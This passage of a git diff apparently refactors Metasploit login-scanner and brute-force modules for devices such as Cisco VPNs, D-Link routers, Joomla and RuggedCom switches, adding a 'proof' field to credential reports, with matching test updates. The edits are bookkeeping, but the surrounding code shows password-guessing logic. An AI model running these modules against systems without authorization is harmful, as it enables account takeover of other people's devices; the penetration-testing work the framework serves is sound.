-        report_cred(ip: rhost, port: rport, user: user, password: pass)
+        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.get_cookies.inspect)
         return :next_user
 
       else
diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
index 145ef81c0a..5ad7ed6458 100644
--- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
+++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
@@ -178,6 +178,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -224,7 +225,7 @@ class Metasploit3 < Msf::Auxiliary
 
         do_logout(resp.get_cookies)
 
-        report_cred(ip: rhost, port: rport, user: user, password: pass)
+        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
         report_note(ip: rhost, type: 'cisco.cred.group', data: "User: #{user} / Group: #{group}")
         return :next_user
 
diff --git a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb
index 64c56ad076..a64f3b8a87 100644
--- a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb
@@ -1,3 +1,4 @@
+
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -103,6 +104,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -117,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary
 
     if result == :success
       print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
-      report_cred(ip: rhost, port: rport, user: user, password: pass)
+      report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)
 
       return :next_user
     else
diff --git a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
index b710443945..8816247bf2 100644
--- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
     if result == :success
       print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
 
-      report_cred(ip: rhost, port: rport, user: user, password: pass)
+      report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)
 
       return :next_user
     else
@@ -131,6 +131,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
diff --git a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
index b74c903976..f2e2ad293a 100644
--- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
@@ -104,6 +104,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -119,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary
     if result == :success
       print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
 
-      report_cred(ip: rhost, port: rport, user: user, password: pass)
+      report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)
 
       return :next_user
     else
diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb
index 5ba4d5a225..8acee32259 100644
--- a/modules/auxiliary/scanner/http/dolibarr_login.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_login.rb
@@ -77,6 +77,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -125,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
     location = res.headers['Location']
     if res and res.headers and (location = res.headers['Location']) and location =~ /admin\//
       print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
-      report_cred(ip: rhost, port: rport, user: user, password: pass)
+      report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.headers['Location'])
       return :next_user
     else
       vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"")
diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
index 0a248e088f..c78ded7771 100644
--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -81,6 +81,7 @@ class Metasploit3 < Msf::Auxiliary
     login_data = {
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -129,7 +130,8 @@ class Metasploit3 < Msf::Auxiliary
       report_cred(
         ip: Rex::Socket.getaddress(datastore['RHOST']),
         port: datastore['RPORT'],
-        user: user
+        user: user,
+        proof: base_uri+l
       )
     end
 
diff --git a/modules/auxiliary/scanner/http/ektron_cms400net.rb b/modules/auxiliary/scanner/http/ektron_cms400net.rb
index 169c17cefd..77ff86171e 100644
--- a/modules/auxiliary/scanner/http/ektron_cms400net.rb
+++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb
@@ -145,6 +145,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -167,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
 
       if (res and res.code == 200 and res.body.to_s.match(/LoginSuceededPanel/i) != nil)
         print_good("#{target_url} [Ektron CMS400.NET] Successful login: '#{user}' : '#{pass}'")
-        report_cred(ip: rhost, port: rport, user: user, password: pass)
+        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
 
       elsif(res and res.code == 200)
         vprint_error("#{target_url} [Ekton CMS400.NET] - Failed login as: '#{user}'")
diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb
index 0939f53a09..9da9bffde7 100644
--- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb
+++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb
@@ -87,6 +87,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -113,7 +114,7 @@ class Metasploit3 < Msf::Auxiliary
 
     if res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("EtherPAD")
       print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
-      report_cred(ip: rhost, port: rport, user: user, password: pass)
+      report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
       return :next_user
     else
       vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb
index 2278d40260..e1c3773db9 100644
--- a/modules/auxiliary/scanner/http/infovista_enum.rb
+++ b/modules/auxiliary/scanner/http/infovista_enum.rb
@@ -100,6 +100,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -126,7 +127,7 @@ class Metasploit3 < Msf::Auxiliary
         vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
       else
         print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
-        report_cred(ip: rhost, port: rport, user: user, password: pass)
+        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
         return :next_user
       end
 
diff --git a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
index 6fee0a5043..0b355c0e4f 100644
--- a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
+++ b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
@@ -130,6 +130,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -142,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
 
     if result == :success
       print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
-      report_cred(ip: rhost, port: rport, user: user, password: pass)
+      report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)
       return :abort if datastore['STOP_ON_SUCCESS']
       return :next_user
     else
diff --git a/modules/auxiliary/scanner/http/novell_mdm_creds.rb b/modules/auxiliary/scanner/http/novell_mdm_creds.rb
index 9a3349e800..3c03a14c2d 100644
--- a/modules/auxiliary/scanner/http/novell_mdm_creds.rb
+++ b/modules/auxiliary/scanner/http/novell_mdm_creds.rb
@@ -97,6 +97,7 @@ class Metasploit3 < Msf::Auxiliary
     login_data = {
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -122,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary
         print_good("Got creds. Login:#{user} Password:#{pass}")
         print_good("Access the admin interface here: #{ip}:#{rport}#{target_uri.path}dashboard/")
 
-        report_cred(ip: ip, port: rport, user: user, password: pass)
+        report_cred(ip: ip, port: rport, user: user, password: pass, proof: res.body)
       else
         print_error("Zenworks MDM does not appear to be running at #{ip}")
         return :abort
diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
index 0c1f907769..bc29b6d04c 100644
--- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb
+++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
@@ -70,6 +70,33 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Brute-force the login page
   #
@@ -96,16 +123,14 @@ class Metasploit3 < Msf::Auxiliary
 
     if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString"))
       print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
-      report_hash = {
-        :host   => rhost,
-        :port   => rport,
-        :sname  => 'Oracle Integrated Lights Out Manager Portal',
-        :user   => user,
-        :pass   => pass,
-        :active => true,
-        :type => 'password'
-      }
-      report_auth_info(report_hash)
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'Oracle Integrated Lights Out Manager Portal',
+        user: user,
+        password: pass,
+        proof: res.body
+      )
       return :next_user
     else
       vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb
index e0ab987b7b..8aed527ef6 100644
--- a/modules/auxiliary/scanner/http/pocketpad_login.rb
+++ b/modules/auxiliary/scanner/http/pocketpad_login.rb
@@ -63,6 +63,33 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_time: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Brute-force the login page
   #
@@ -86,16 +113,14 @@ class Metasploit3 < Msf::Auxiliary
 
     if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol"))
       print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
-      report_hash = {
-        :host   => rhost,
-        :port   => rport,
-        :sname  => 'PocketPAD Portal',
-        :user   => user,
-        :pass   => pass,
-        :active => true,
-        :type => 'password'
-      }
-      report_auth_info(report_hash)
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'PocketPAD Portal',
+        user: user,
+        password: pass,
+        proof: res.body
+      )
       return :next_user
     else
       vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
diff --git a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb
index 115ceff6d4..8cf4fdc12f 100644
--- a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb
+++ b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb
@@ -76,6 +76,32 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Brute-force the login page
   #
@@ -96,16 +122,14 @@ class Metasploit3 < Msf::Auxiliary
 
     if (res and res.code == 302 and res.headers['Location'].include?('redirectId'))
       print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
-      report_hash = {
-        :host   => rhost,
-        :port   => rport,
-        :sname  => 'Radware AppDirector',
-        :user   => user,
-        :pass   => pass,
-        :active => true,
-        :type => 'password'
-      }
-      report_auth_info(report_hash)
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'Radware AppDirector',
+        user: user,
+        password: pass,
+        proof: res.headers['Location']
+      )
       return :next_user
     else
       vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb
index 62497673fc..cb103e7da7 100644
--- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb
+++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb
@@ -128,16 +128,14 @@ class Metasploit3 < Msf::Auxiliary
 
         collect_info(user, pass)
 
-        report_hash = {
-          :host   => rhost,
-          :port   => rport,
-          :sname  => 'RFCode Reader',
-          :user   => user,
-          :pass   => pass,
-          :active => true,
-          :type => 'password'}
-
-        report_auth_info(report_hash)
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'RFCode Reader',
+          user: user,
+          password: pass,
+          proof: res.code.to_s
+        )
         return :next_user
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
@@ -146,6 +144,33 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Collect target info
   #
diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
index 5621d690b2..f83d2b5033 100644
--- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
+++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
@@ -50,6 +50,30 @@ class Metasploit3 < Msf::Auxiliary
     }
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def enum_user(user='administrator', pass='pass')
     vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' password:'#{pass}'")
     success = false
@@ -89,14 +113,12 @@ class Metasploit3 < Msf::Auxiliary
 
     if success
       print_good("#{rhost}:#{rport} - Successful login '#{user}' : '#{pass}'")
-      report_auth_info(
-        :host   => rhost,
-        :proto => 'tcp',
-        :sname  => 'sap-businessobjects',
-        :user   => user,
-        :pass   => pass,
-        :target_host => rhost,
-        :target_port => rport
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'sap-businessobjects',
+        user: user,
+        proof: res.body
       )
       return :next_user
     else
diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb
index 9f7e9a59ab..35833d09af 100644
--- a/modules/auxiliary/scanner/http/splunk_web_login.rb
+++ b/modules/auxiliary/scanner/http/splunk_web_login.rb
@@ -148,6 +148,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -190,7 +191,7 @@ class Metasploit3 < Msf::Auxiliary
       end
 
       print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
-      report_cred(ip: datastore['RHOST'], port: datastore['RPORT'], user:user, password: pass)
+      report_cred(ip: datastore['RHOST'], port: datastore['RPORT'], user:user, password: pass, proof: res.code.to_s)
 
 
       return :next_user
diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb
index 03fa58ab3f..5c14785e1e 100644
--- a/modules/auxiliary/scanner/http/vcms_login.rb
+++ b/modules/auxiliary/scanner/http/vcms_login.rb
@@ -71,6 +71,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -119,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary
         vprint_status("#{peer} - Username found: #{user}")
       when /\<a href="process\.php\?logout=1"\>/
         print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
-        report_cred(ip: rhost, port: rport, user:user, password: pass)
+        report_cred(ip: rhost, port: rport, user:user, password: pass, proof: res.body)
         return :next_user
       end
     end
diff --git a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb
index b08d53cd3f..2a1337914a 100644
--- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb
+++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb
@@ -151,6 +151,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -205,7 +206,7 @@ class Metasploit3 < Msf::Auxiliary
 
       # Report valid credentials under the CCTV DVR admin port (5920/TCP).
       # This is a proprietary protocol.
-      report_cred(ip: rhost, port: rport, user:user, password: pass)
+      report_cred(ip: rhost, port: rport, user:user, password: pass, proof: res.inspect)
 
       @valid_hosts << rhost
       return :next_user
diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
index 210a41b647..a23e6058ef 100644
--- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
@@ -79,6 +79,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -95,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary
           mac  = banner_santized.match(/((?:[0-9a-f]{2}[-]){5}[0-9a-f]{2})/i)[0]
           password = mac_to_password(mac)
           info = get_info(banner_santized)
-          report_cred(ip: rhost, port: rport, user:'factory', password: password)
+          report_cred(ip: rhost, port: rport, user:'factory', password: password, proof: banner_santized)
           break
         else
           print_status("It doesn't seem to be a RuggedCom service.")
diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb
index 214dc66eed..505581a4de 100644
--- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb
+++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb
@@ -58,6 +58,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -70,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
       case result
       when :success
         print_good "#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})"
-        report_cred(ip: rhost, port: rport, user: user, password: pass)
+        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)
         return if datastore['STOP_ON_SUCCESS']
       when :fail
         print_error "#{rhost}:#{rport} - Login Failure (#{user}:#{pass})"
diff --git a/modules/auxiliary/voip/asterisk_login.rb b/modules/auxiliary/voip/asterisk_login.rb
index 147a417d1a..a05995214d 100644
--- a/modules/auxiliary/voip/asterisk_login.rb
+++ b/modules/auxiliary/voip/asterisk_login.rb
@@ -72,6 +72,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -117,7 +118,7 @@ class Metasploit3 < Msf::Auxiliary
         send_manager(cmd)
         if /Response: Success/.match(@result)
           print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{rhost}:#{rport}!")
-          report_cred(ip: rhost, port: rport, user: user, password: pass)
+          report_cred(ip: rhost, port: rport, user: user, password: pass, proof: @result)
           disconnect
           return :next_user
         else
diff --git a/test/modules/auxiliary/test/report_auth_info.rb b/test/modules/auxiliary/test/report_auth_info.rb
index 0a43898e17..af7ffcc6b6 100644
--- a/test/modules/auxiliary/test/report_auth_info.rb
+++ b/test/modules/auxiliary/test/report_auth_info.rb
@@ -26,102 +26,102 @@ class Metasploit3 < Msf::Auxiliary
 
   def test_novell_mdm_creds
     mod = framework.auxiliary.create('scanner/http/novell_mdm_creds')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_joomla_bruteforce_login
     mod = framework.auxiliary.create('scanner/http/joomla_bruteforce_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_infovista_enum
     mod = framework.auxiliary.create('scanner/http/infovista_enum')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_etherpad_duo_login
     mod = framework.auxiliary.create('scanner/http/etherpad_duo_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_ektron_cms400net
     mod = framework.auxiliary.create('scanner/http/ektron_cms400net')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_drupal_views_user_enum
     mod = framework.auxiliary.create('scanner/http/drupal_views_user_enum')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, proof: FAKE_PROOF)
   end
 
   def test_dolibarr_login
     mod = framework.auxiliary.create('scanner/http/dolibarr_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_dlink_dir_session_cgi_http_login
     mod = framework.auxiliary.create('scanner/http/dlink_dir_session_cgi_http_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_dlink_dir_615h_http_login
     mod = framework.auxiliary.create('scanner/http/dlink_dir_615h_http_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_dlink_dir_300_615_http_login
     mod = framework.auxiliary.create('scanner/http/dlink_dir_300_615_http_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_cisco_ssl_vpn
     mod = framework.auxiliary.create('scanner/http/cisco_ssl_vpn')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_cisco_ironport_enum
     mod = framework.auxiliary.create('scanner/http/cisco_ironport_enum')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_cisco_asa_asdm
     mod = framework.auxiliary.create('scanner/http/cisco_asa_asdm')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_axis_local_file_include
     mod = framework.auxiliary.create('scanner/http/axis_local_file_include')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_splunk_web_login
